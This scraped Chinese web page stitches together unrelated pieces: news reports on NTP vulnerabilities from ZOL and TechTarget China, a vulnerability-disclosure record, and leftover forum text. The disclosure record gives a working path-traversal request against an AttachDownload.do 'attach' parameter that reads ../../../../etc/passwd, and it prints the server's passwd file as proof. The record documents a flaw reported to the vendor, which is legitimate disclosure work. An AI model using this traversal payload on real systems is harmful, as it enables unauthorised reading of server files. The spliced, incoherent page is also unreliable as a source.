电脑漏洞存在NTP漏洞有什么影响?

&&|&&责编:刘菲菲
  【中关村在线软件资讯】10月23日消息:如果有一个漏洞能让你穿越到未来你会不会感兴趣?当然这只是个笑话,但是这笑话到了黑客手里就不好笑了。思科研究人员最近在网络时间协议(NTP)中发现了8个安全漏洞,这些漏洞的其中一个能够让黑客操纵目标的时钟。要知道操纵网络时间是会产生很大的负面影响的,还记得千年虫吗?  据悉,这些漏洞影响了NTP协议守护进程,这是个负责在整个计算机网络中进行时间同步的协议,包括互联网、内连网和更小的LAN。  有意思的是,这些漏洞发现的时间恰巧是日,也就是Michael&J.&Fox在电影《回到未来2》中穿越所至的时间。  不过这些漏洞所造成的影响可以点意思也没有,而且危害很大,比如能够绕过证书,让黑客修改本地系统时间;允许内存崩溃问题启用协议致缓冲区溢出或释放后使用攻击;甚至破坏守护进程或令其进入死循环导致DoS状态。  好在NTP协议开发者已经发布了新版,修复这个危险的漏洞。分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
详细说明:
/menu!AttachDownload.do?attach=
attach参数没过滤
/menu!AttachDownload.do?attach=../../../../../../etc/passwd
漏洞证明:
code 区域root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:&Saslauthd user&:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
oracle:x:500:500::/home/oracle:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
open:x:::/home/open:/bin/bash
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:中
漏洞Rank:6
确认时间: 17:01
厂商回复:
感谢您对快钱的关注,我们将立刻安排修复
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论,请先研究人员揭NTP漏洞 严重者可通过单个数据包被远程利用
日期:作者:翻译:来源:TechTarget中国
&&&&&&&&&&&&&&&
【TechTarget中国原创】 根据研究人员表示,在新发现的几个Network Time Protocol(网络时间协议)安全漏洞中,最严重的漏洞可以允许攻击者通过单个数据包来远程利用。 网络时间协议(NTP)是用于同步全球各地计算机和服务器时间的协议,最近研究人员在该协议中发现了几个漏洞,攻击者可能利用这些漏洞来攻击各种易受攻击的系统。 谷歌公司安全团队成员Neel Mehta和Stephen Roettger向网络时间基金会(Network Time Foundation)共报告了8个NTP安全漏洞,包括该协议生成的弱密钥的多个问题。网络时间基金会是以研究为重点的NTP项目的监管机构。 其中最严重的漏洞是CVE-,NTP项目公告称这个缓冲区溢出漏洞可以通过单个精心设计的数据包被远程利用。成功利用CVE-可能允许攻击者在ntpd进程的相同特权级别执行恶意代码。 NTP项目在其公告中补充说,上周发布的NTP 4.2.8版本已经修复了这两个最严重的漏洞,他们还计划在一个月内发布另一个补丁来解决其余问题。 工业控制系统网络应急响应小组(ICS-CERT)警告称,NTP被广泛应用在工业控制系统中,即使是低级攻击者也可能利用这些NTP漏洞。ICS-CERT还警告说,已经有传言称发现针对这些漏洞的利用情况,不过目前还没有关于这些漏洞利用的有效信息。 对企业的影响:“很多系统”运行NTP 对于如何应对NTP漏洞,解决方案供应商Metaforce Technologies公司高级咨询工程师Rob VandenBrink在SANS研究所的Internet Storm Center博客中表示,企业应该注意网络中运行NTP的各种系统,这些NTP可能没有关联到NTP项目,这包括路由器、交换机、VoIP网管、邮件服务器等。 根据Vandenbrink表示,他试图扫描服务器中的NTP安全漏洞,结果立即有所发现。 “在现在自动更新的时代,你可能会认为大多数NTP服务器会对谷歌团队发现的漏洞进行修复,”VandenBrink表示,“不过,这只可能发生在第二台主机检查发现很过时的服务器时。不幸的是,这是大型加拿大ISP的主要NTP服务器。”
我们一直都在努力坚持原创.......请不要一声不吭,就悄悄拿走。
我原创,你原创,我们的内容世界才会更加精彩!
【所有原创内容版权均属TechTarget,欢迎大家转发分享。但未经授权,严禁任何媒体(平面媒体、网络媒体、自媒体等)以及微信公众号复制、转载、摘编或以其他方式进行使用。】
微信公众号
TechTarget
TechTarget中国
查看更多评论
敬请读者发表评论,本站保留删除与本文无关和不雅评论的权力。
As news writer for SearchSecurity and SearchCloudSecurity, Brandan Blevins covers the enterprise information security landscape, from data breaches and research reports to IT security product market trends and case studies.
面对看似无休止的网络攻击时,最好的处理方式是:不应再把关注重点放在改善网络安全上,而应该放在如何构建安全的网络上……
目前多达320万计算机运行着未打补丁版本的JBoss中间件软件,这意味着这些计算机很容易被用于传播SamSam和其他勒索软件,这也突出了一直存在的未打补丁系统的风险问题……
网络攻击方间的协作、交互都比防守方更强大,面对如此的情境,作为安全的守护方,我们怎能不联结起来呢?
从攻击特点上,Linux Mint被攻击事件中,黑客只是替换了官方网站的链接地址,但黑客行动的细节却让许多颇具安全意识的用户也难逃一劫。为何这样说呢?
TechTarget
企业级IT网站群
TechTarget中国 版权所有
All Rights Reserved, Copyright
TechTarget中国 版权所有
All Rights Reserved, Copyright

我要回帖

更多关于 电脑漏洞有必要修复吗 的文章

 

随机推荐